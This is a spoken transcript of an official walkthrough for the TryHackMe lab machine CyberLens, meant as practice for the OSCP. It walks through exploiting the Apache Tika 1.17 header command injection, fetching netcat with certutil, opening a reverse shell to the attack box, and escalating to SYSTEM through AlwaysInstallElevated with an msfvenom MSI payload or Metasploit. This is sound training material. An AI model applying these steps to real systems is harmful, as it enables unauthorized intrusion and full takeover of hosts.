Hey, what is up everyone? Welcome back to another video. In this video, I'm going to give you the official walkthrough for the machine CyberLens on the TryHackMe platform. Now, CyberLens is a machine created by yours truly, and it is the latest machine on TryHackMe. And in this video, I'm going to show you how to exploit this machine and go through the machine two different ways. One way is I'll show you the Metasploit path, where you can kind of do everything in Metasploit with the interpreter shell and even elevate your privileges that way. And the other way is going to be a non-Metasploit path, which would be more like the OSCP. Now, this is an easy rated Windows machine, and it's not overly difficult. Don't have a bunch of rabbit holes for you, but it's very similar to the type of attack path you will encounter if you take the OSCP exam. Now, the thing with the OSCP, if you haven't taken it, the machines on the OSCP aren't overly difficult in and of themselves. What makes it difficult is that time crunch, right? You have those 24 hours to hack into multiple machines and then another 24 hours to write a report, and it's that mental exhaustion, that brain fog that makes it difficult. But each machine on its own is not overly difficult, and I wanted to make this machine to mirror some of what you're going to encounter either in the Pen 200 course or on the exam, kind of a common attack path and a common privilege escalation vector that you will see. So if you are prepping for the OSCP, encourage you to tune in, try this machine on your own actually, and if you get stuck, come back to my video. But here we go. Let's go ahead and dive into things. I will share my screen. Here it is, the CyberLens machine. Once again, it's the latest machine on TryHackMe, so it should be pretty easy to find, and it's free, so no subscription required. Here is the description. Welcome to the clandestine world of CyberLens, where shadows dance amid the digital domain and metadata reveals the secrets that lie concealed within every image. As you embark on this thrilling journey, prepare to unveil the hidden matrix of information that lurks beneath the surface. For here at CyberLens, we make metadata our playground. In this labyrinth realm of cybersecurity, we have mastered the arcane blah blah. I'll let you read that. It was ChatGPT who wrote that for me. I'll just be honest. I didn't write all of that silliness. But here's the idea. Can we exploit the CyberLens web server and discover the hidden flags? We have a user flag and an admin flag. Wait 5 minutes before starting to make sure everything boots up. And you do need to add cyberlens.thm to your Etsy host file. I have all the instructions right here. So let's first just do that, right? So we should just be able to just copy this command right here. And we'll go over to wherever my TryHackMe box is. There is my TryHackMe box, and I am going to do this on the attack box since it's the official walkthrough. I want to make sure I do it in the attack box so everyone is starting in a common place. So this is the web-based attack box on TryHackMe, but let's go ahead and add that to our Etsy host. We'll see if we can ping it now, cyberlens.thm, and let me turn off that silly beep that Ubuntu does real quick. And there we go. We are able to hit cyberlens.thm. Good to go. And the first thing we do is we do a nmap scan. So let's go ahead and do that real quick. We'll do just a basic nmap scan on the most common ports just to see where we should begin our enumeration at. So I'll do nmap. I'll type in cyberlens.thm and T5 to make go fast. We know it's up, so we can ignore host discovery, and -V for verbose mode. And right away, we see a few things that should stand out to us. We have a web server running on port 80. We have 445, 135, 139, so SMB type stuff going on there, and 3389 for RDP. So right away, just based on the ports that are open, we know that we are dealing with the Windows machine. So if you didn't know it was Windows, you would know it now. I'm going to drop this over here so it's out of my way. But we are dealing with a Windows machine. Now, typically when I do a CTF, I scan all the ports and we'll see what's on all of them. But just for the sake of time, I'm just going to do the top most common ports, and I'll show you how we can discover what we need to find as we dig into this web server. So there's all these other ports, but often, especially if you're on something like the OSCP and you see that a web server is open, there's a good chance that web server is going to be the way to get into there. So we have a web server on port 80. Let's just go ahead and check out this web server and see what might be running on that. We'll go to cyberlens.thm. And here we are, my beautiful web server, right? If hacking doesn't work out, I'll become a web developer. But here is CyberLens. We have our CyberLens image extractor, which looks interesting since it takes file uploads. Do we have anything on our contact us page? Not much. CyberLens image extractor goes to this. So it's pretty clear just by going this that, hey, we need to do something with this CyberLens image extractor. And I don't think there's too many images on the attack box. I'm just going to save image as, and we will We'll save it. Yeah, that's fine right there. Save. And let's go ahead and browse and grab that image we just downloaded, that about image right there. And we will click Get Metadata and just see what happens. All right, so it does what it says it does. When you click Get Metadata, it gets the metadata out of the image. You can kind of see it there. So then what should make us curious, I'm just going to refresh this page. We'll jump back over here. You could do this with Burp Suite, but if you don't want to open up Burp Suite, we can just go to More Tools. We can go to Web Developer Tools. And if we go over to network, we can see, hey, what network call is happening when we get this metadata. So let's do this again, but let's monitor it down here to see what network call happens. We'll do Get Metadata. And we can see what should stand out to us. It's making an options and then a put request to some service running on port 61777. Now, if we go back to our Nmap scan, which it looks like I closed out the Nmap scan, 61777 is not a common port. So if you just did a typical Nmap scan like I did in the beginning, you are going to miss this port based on your scan, which is why it's so important on CTFs or things like the OSCP where enumeration is key that you do -P- so you scan all the ports, not just the most common ones, because you might miss something hidden on an uncommon port. But we have this on 61777, which is the request it's making to get this metadata. So let's go ahead and see what is running on there. So I'll go to cyberlens.thm 61777. And we have Apache Tika 1.17, which must be, if we're following through that, hey, this is the information this is how it's pulling that metadata service information out. So let's go ahead and research about this, shall we? Whatever. It's not even my machine. And let's do like exploit. Okay, well, we have Rhino Security Labs, and those of you who know me know that I work at Rhino Security Labs, so if you find a CVE that comes from Rhino, you know you're probably in the right spot. But I actually want to take some time to go through this blog post because I think this is a really cool blog post written by my friend David Yeslin, or Dave is what he goes by. He is a senior pen tester at Rhino, the lead of the pen testing team. I actually meet with him every single week for one-on-ones. Really genuine, solid human being. But one cool thing here is he did not discover the CVE, but he like reverse engineered the CVE, which is one thing that you can do for security research. If you don't find CVEs, you can find a CVE that doesn't disclose the details and then kind of reverse engineer it and write a POC for it, which is exactly what he did. So before we even dive into this, I want to go through this blog because I just thought it was cool how we discovered this. So let's go through this. This post is a walkthrough of steps taken to go from an undisclosed CVE for a command injection vulnerability in the Apache Tika server to a complete exploit. The CVE is this, so here's the information he had to go by. Apache Tika 1.7 to 1.17 could send carefully crafted headers to Tika server that could be used to inject commands into the command line of the server running Tika server. This vulnerability only affects those running Tika server on a server that is open to untrusted clients. The mitigation is to upgrade to 1.18. So that is the information that he initially started with. So what is Apache Tika? Well, it extracts metadata. We kind of saw that by using it on the website, the CyberLens image extractor. And it has a few different components, a Java library, a command line tool, and a standalone server with its own REST API. So breaking down the CVE. So to start looking for the issue, we need to, of course, read the CVE advisory and see what information we have, which we just read that. We have some information there from it. And things we can tell from the description. 1.18 is patch. 1.17 is unpatch. The vulnerability is command injection. The entry point is some type of headers, and it affects the Tika server portions of the code. With this info, we now have a starting point to try and identify the vulnerability. The next step would be to perform the diff of the patch and unpatched versions of Tika, specifically the Tika server portions. Grepping the code for functions in Java known to perform operating system commands would be another good place to look. Finally, searching for sections of the Tika server code which relate to interpreting headers from what we can assume will be some kind of HTTP request. Like, this is so cool to me that he took this CVE with not much information and pulled down the code and then created a POC for it. Like, blows me away. But this is what he did. He did a side-by-side recursive diff of 1.7, remember, or 1.17 vulnerable, 1.18 patch, and there's only one file that has been modified. And this is the one file that's been modified. You can see the modification made. And since the goal is to find command injection in a header field, having the first result be a code block, which has been added in the patch version called allowable header characters, right? That's a pretty good start. The assumption is that this is some kind of patch trying to filter characters, which could be used to inject commands into the target field. So continuing down is a large block of code inside of a function called process header config, which looks interesting and has been removed or changed in 1.18. So another difference between our vulnerable code and our patch code. It is using some variable to dynamically create a method which appears to set properties of some object, and it uses the HTTP headers to do this. So Dave knows, like, hey, I'm looking at the right area. It talked about headers. It talked about command injection. We are unraveling the mystery of the CVE to try to get a POC put together. And here's the description of the function. The code or objects that the property on, the key of the HTTP header, name of the HTTP header. So we have more header information. The prefixes for the different properties were shown in the previous screenshot and are defined as static strings at the beginning of this code, right there. So we have a couple of static strings that can be included as HTTP headers with a request and used to set some property of an object. An example of the final header would look something like x, Tika, OCR, some property, and some value. Some property then gets converted to a function that looks like set some property and is invoked passing some value to it as the value to set. A little bit confusing, but hopefully we're tracking a little bit. We see these headers, and this is where we might be able to get command injection in. So here you can see this function is being used and where the prefix header is checked in the request to determine how to call the function. All the needed arguments are then passed in from the HTTP request to the process header config. So we have user input. Looking at the way process header config function is used, you can see the properties are being set on that object. Doing a search for places that may use that, we find this, which turned out to be pretty interesting. Here is the do OCR function from that, which is passing the config properties from that object. I know, confusing, we'll get through it, which we just discovered directly into an array of strings, which are used to construct a command for process builder, and then the process is started. So hopefully you are tracking how this might get to RCE. So this looks promising. If we put together all the information we have found so far, we should technically be able to make some kind of HTTP request to the server, set a header that looks for this, and have this command be inserted into the command string and be executed. The only problem is the config get tester path is prepended to another string we cannot control, which ends up being a static string. To fix this, we can wrap our command we want to execute into double quotes, and Windows will ignore whatever is appended to it after the quotes, just executing our injected command. To put this to the test, we can just use an example from the Tika server documentation for retrieving some metadata about a file, right? So he goes through and tests this to do your default POC of launching calculator, and it works. But can you do more than pop calculator? Now, I'm not going to go through the rest of this, but encourage you to check it out. But he talks about how really looking through here and using some like lol bin type stuff, living off the land, and how we can inject more commands than just the calculator, and eventually with cscript.exe, which is a common thing in that area with lol bins. With that, you can do any command you want. And then there's, of course, a POC for this right here. Now, here's a part that is very realistic to the OSCP. You have an exploit that's going to be your initial way in, but here's the thing. Not even on purpose. Well, initially the exploit didn't work. So here was the exploit. Originally, it was written in Python 2, and it would just fail because it was Python 2 and it was old. I updated it to make it Python 3, but I screwed up the formatting when I did to Python 3, and I just realized it today when I was checking things over. So if you try to run this right now, at least I'm pretty sure, it will not actually work. It will fail. And you'll often encounter this on the OSCP, that you'll find an exploit, it will be the way in, but the one you find will fail, so you have to do a little bit more digging. Well, on this example, someone who I'm guessing went through the box did a pull request, and they said, hey, go ahead and update it with these changes, right? Fix lines 41 to 44, and fix line 44, and updated lines to use Python 3. And this one does actually work. We can go in and just jump over to his patch and check it out, and honestly, when I'm done with the stream, I think I have permission to approve the patch, and I will go ahead and approve this so it goes to the official CVE list. But here is the one that this person updated. Once again, I'm guessing as they were going through this machine, because I think this pull request is from recently. So I'm going to go ahead and copy this, and we'll go over to our terminal. Do I already have the terminal open? I do. Do I already have 2 terminals open? I do. All right. We'll just use this terminal, and we'll do nano exploit.py, paste our code in here, save it. And what I'm showing you this first time is the manual way of exploiting the box. The manual way takes a little bit longer. When we're done with the manual way, I'll show you how you can do this in like, I don't know, 5 minutes with Metasploit. But I think it's always good to understand the manual way, especially for those of you studying for the OSCP. So let's try to run it and see the options we are given. So it says, hey, run this. We want to hit our target localhost for testing, and then our target port, and then whatever command that we want to run. So let's do Python 3 exploit.py. Ours would be cyberlens.thm, and 6177 is where it's hosted. But what command do we want to run? Well, ultimately, our goal is to get an initial reverse shell, and one good way to do that is with netcat.exe. So let me go ahead and open a new tab, and I will do locate netcat.exe. We have in a few different places. I'm going to make a directory called web server, cd into web server. And for those of you who don't know, at least the paid version of the attack box actually has a public IP. And when you host a basic Python web server, you're actually putting this out on the internet. So whether you're using the attack box or a command and control server that has a public IP, it's always helpful to make a separate directory for a web server and make an index.html, even if it's blank. So I'm going to do that, touch.index.html. So we have one. And now I'm going to copy from root downloads netcat.exe to this directory, and now we'll host a very simple Python web server on port 8080. And let's jump back over to here. We need to do a command right here in order, and there's multiple ways you can do it. Knox Limit said, I use a base 64 encoded PowerShell from RevShells. Yeah, so there's a bunch of different ways you can do this, but I know one of the ways, or one of the primary ways it teaches on the OSCP is netcat is a big thing. So I'll show you guys a netcat way, but you have full RC at this point. So there's a bunch of different ways you can end up getting this shell, but here we go. I'm gonna do cert util URL cache -f, and then we're going to give it our attack box IP 10.10.249.174 port 8080 netcat.exe, and then we need to save it to a place that we know we can write. And on a Windows machine, a good spot to guess might be C users public netcat.exe. That always, not always, let's just say 99% of the time, this works for me when I'm doing a CTF. I can write to that folder on a Windows machine, make sure our web server is running, which it is, and let's go ahead and hit enter. Now we should get a hit on our web server, which we got like 4 of them, so I'll take that as good. Like it hopefully downloaded it. And now let's set a netcat listener. Every good hacker, of course, uses port 1337, so we will as well. And now we're going to change our command up a little bit. So to get our reverse shell, we're going to do, I believe this is the syntax. I always mess up the syntax, so I might mess it up again. But we're going to give it our attack IP that we're listening on, so 254.9.174, our listening port, and then we want to launch command.exe. I think that's the syntax. We might have to Google it, fingers crossed. I don't know why I always forget that very simple netcat syntax. Okay, looks like I did. Did I do the syntax wrong? Cert util URL cache -f netcat.exe c users public netcat.exe c users public. Did I do it wrong? Okay, I hate this aspect about this. Let me see if I can fix my settings real quick. 1 second. How do I edit the freaking dock settings, bro? No, I don't want to edit. I just want to edit the dock itself. I just want it to stay. Okay, whatever. I'll just go over here and click it then. All right, let's see if my syntax is wrong. It probably is. Close out, close out. Nope, my syntax is correct, isn't it? netcat.exe, our IP, that dash e cmd.exe. What am I doing wrong? Here's my little cheat sheet. Am I doing something wrong? See, I don't think so. What the heck? It's my own machine and I can't even exploit it. All right, let me look at it. I must have something wrong in my syntax. Cert util URL cache dash F. We have that. And then we're putting in C users public. Oh, my slashes are wrong, I think. It's reading my slashes incorrectly. Here's what I mean. This right here, I think because of how the exploit is written, we need our slashes to be that way. Let's see if I'm right. Try this again. All right, now let's go ahead and open up our listener. And now we'll go back to this. I'm going to change my slashes around here. Fingers crossed. Boom. All right, that's all it was. My slashes are just wrong. So who am I? We are now the CyberLens user. So we can go to CD users. Here, let me see if I can make this a little bit bigger for you guys. All right, that's better. And if we dir it out, we can CD CyberLens, dir, CD desktop. All right, there's user.txt. Although I'm not going to show you user.txt, I will make you work on your own to get user.txt, but there it is. So now we need to figure out privilege escalation. And one common thing to do when you're doing the OSCP is to run something like WinPs and see if there are any common escalation vectors here. So let's go ahead and do that. And first we need to get WinPs. I'm going to open up, we'll do it here. Well, let's go to our web server first. CD web server, locate WinPs. Do we not have it on here? Is there not? How about here? Do not actually have, oh, there's bin. Maybe it's in bin. There's WinPs.exe, all right. I just wasn't sure where it's at on the attack machine. Oh, whoops, not ls. I meant to see copy it. Let's try that again. All right, there's WinPs.exe. Let's go ahead and upload that to our machine now. Python 3. Host a basic web server again. Go back to our shell right here, and we'll do cert util URL cache.f attackbox IP 10.10.249.174.8080 and WinPs.exe, and we'll do C users CyberLens desktop WinPs.exe. All right. We'll let this run for a little bit. Let me look over at chat and make sure I'm not missing anything. Malware comment said, trying to follow, but I missed the beginning. I don't know when you posted that, but I think you may have posted it right in the beginning, so you didn't miss a whole lot. I was just giving some background on the exploit that I'm using for the machine. Malware Combat said, so not ready for OSCP. Yeah, I don't know if you are or not. That'll be up to you, my friend. I will say, like, this is a pretty easy machine overall. So if you got like fully stuck on this machine, you may want to do some more practice before the OSCP. Doc Money said, I didn't get the notification went live. What's on the menu tonight? Hope you're well, man. I am doing the official walkthrough for my CyberLens machine I created. At least the live stream. I'll release it in a few days. But let's see. I'm actually curious if this will find the privilege escalation path. I mean, it should, because it's a super common thing that you're taught on the OSCP and like every other course. Oh. My, the history, the freaking terminal history is set so it's not showing me all the background. Let's see if this is going to show me the privilege escalation path. Otherwise, I'm going to have to change the terminal history so it shows us everything. As you saw, we didn't get the beginning of WinPs. Oh. All right. So you can see it right here. If you're going through the WinPs results, this is what should stand out to you. And when you're doing something like the OSCP, this is a very common privilege escalation path that you may discover on the exam, or you're going to discover on other CTFs. And it's when always install elevated is enabled. You can see it's set to 1 in both places, which means, all right, let's check this out. If we didn't know what that is, let's go ahead and read about it, right? So we'll go ahead and copy this link, open up Firefox, which I already have open. We don't need to open it again. Right here. And let's check this out. What is always install elevated? All right, there we go. Oh, always. There. Oh, that's to enable it, but we already have always install elevated. I don't know why it doesn't just explain it here. Let's look at it this way. Maybe there's a better article that explains this. Okay, always install elevated, a functionality that allows a regular user to install MSI files with high privileges, right? So it doesn't install under our current user. If we pull up our terminal here, an MSI file is a common file in Windows for installing Microsoft Service. I think it's Microsoft Service Installer or something along those lines. And if always install elevated is enabled, what it means is when we install an MSI, like right now, if we do who am I, we are the CyberLens user. If we do who am I priv, we don't have any special privileges. If we do net user CyberLens, you can see we're part of the remote desktop user, so we could RDP, and we're part of users, but we're not part of admin. If we do net users, the other one is administrator. That's what we want to compromise, right? So our current user is not an administrator, but when always install elevated is enabled, it means if we're able to install an MSI, it's going to install the MSI from NT system authority privileges. So anything we install is going to be executed from a system level. And with that information in mind, there's actually a lot of different ways you can exploit this. And that's just showing where you can see it at and exactly how you can do it. You can create a reverse shell that does it right here, and it will give us a reverse shell as NT system authority. So let me go ahead and just show this to you. Hengi said, hi, am I too late? I was doing the room and stuck at Privest. No, you're right on time, my friend. We're right to the privilege escalation path. So you're right on time. So let's go ahead and do this. MSF Venom is allowed on the OSCP. Metasploit is technically allowed as well, but only to use one time. But MSF Venom for creating payloads, you can use as many times as you want on the OSCP. And we have a payload right here. So let's check this out ourselves. Go back to here. Go back to our web server. And type this in. And you can see what it's doing. We're doing MSF Venom, the platform Windows, x64, and here's our payload. We want to get a reverse TCP shell, so not even an interpreter shell, but just a TCP shell. And port 1337, that's not going to work for us because I'm already using that port. We'll do port 444. Our L host is going to be our listener. So let's go ahead and do this. 10.10.249.174. We don't even need to encode it because there's no EDR on the machine, but we'll just do that and see if it works. While that installs, let's continue to read. So you can see they have a little demo here. Oh, they have RDP access. I'm trying to think of, it's MSI exec. Let's check this out. Just the command line thing. So this is showing how to set it up in your own lab, blah, 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 blah. How you can see if it's enabled. And another thing right here, right? This is a interpreter shell We're just doing a standard TCP shell, but that'd be another way to do it as an interpreter. But if you're doing the OSCP, right, that would require Metasploit. There's the command I was looking for. All right, let's go back to our terminal. And our always install elevated is done. So we'll go back over to our shell here, and we'll do cert util URL cache -f, grab our IP of our attack box 249.174, port 8080, and then honestly, is it just called always install elevated? I'm gonna mess that up if I try to type it, so I'm gonna copy it, jump over to this, and we'll save it to users, CyberLens, desktop, always install elevated. A connection with server cannot be established. 10.10.249.174.8080. Oh, you know, it would probably be helpful if I actually hosted a Python web server when I tried to, you know, download files from there. Let's try that again. Of course, that's not going to work. We'll copy this. All right. Now we have the always install elevated there, and we use port 444, right? All right, so we'll do netcat mvlp 4444, set up our listener, and if we go back to the article, we can see the exact syntax for running this. It is this right here, and then we'll give it the MSI. So I'm going to copy that, go back over to our terminal, go back over to here, and we'll do that. Always install elevated.msi. Fingers crossed. Who am I? And you can see we are now NT authority system, so we can do CD users, dir CD administrator, CD desktop, and there is the admin.txt flag. I'm not going to read it for you on stream. Would encourage you to do that on your own. So that, my friends, is the manual way of going about this room. And now I'll show you how to do it the Metasploit way, which is super quick. Like, you'll be amazed how quick the Metasploit way is. But of course, in the OSCP, you can always only use a Metasploit once. But let me show you that process real quick. We'll just exit out of all this. Exit out of this. Exit. All right, and now let's do MSF console-key, Q, that just means to open it in quiet mode. And we'll be able to do this, I'm looking at my timer, I bet in 5 minutes, maybe. We can exploit this entire machine in like 5 to 10 minutes at the most with Metasploit. Longest part is just waiting for Metasploit to open. There we go. So we can search Apache Tika. I spelled that wrong. Search Apache Tika. Use that. Options, set our host cyberlens.thm, set our port 61777. Everything else looks fine. We can set an L port to 4443. Run. So this is just everything we did manually when I uploaded netcat and everything. That's what Metasploit is doing for us right now. It's going to give us a full interpreter shell. There we go. Get UID. You can see we're CyberLens. Now watch this. I'm going to background this. I'm going to search for always install elevated. I'm going to use that. If we look at our options, it takes a session. So let me just do sessions. All right, so we have one session. We'll do set session 1. We'll do run. Get UID. And now we're NT authority system. What did that take me? I think that took me 4 minutes. So that is the Metasploit way instead of the manual way, just showing how Metasploit can really automate this attack path and give you NT authority system quickly. So once again, not a hard machine. I made this an easy machine on purpose, but it really does show what you will encounter on exams like the OSCP. So if you went through this machine and you are struggling with it, I would encourage you brush up on your Windows privilege escalation, your Windows attacks, before you maybe sit for the OSCP, because it's a very common type of attack that you will encounter. So hey y'all, hope you found this video helpful. Let me know in the comments what you thought about this machine, any feedback that you might have, and would love to hear from you. But thank you for watching. I will see you in the next one.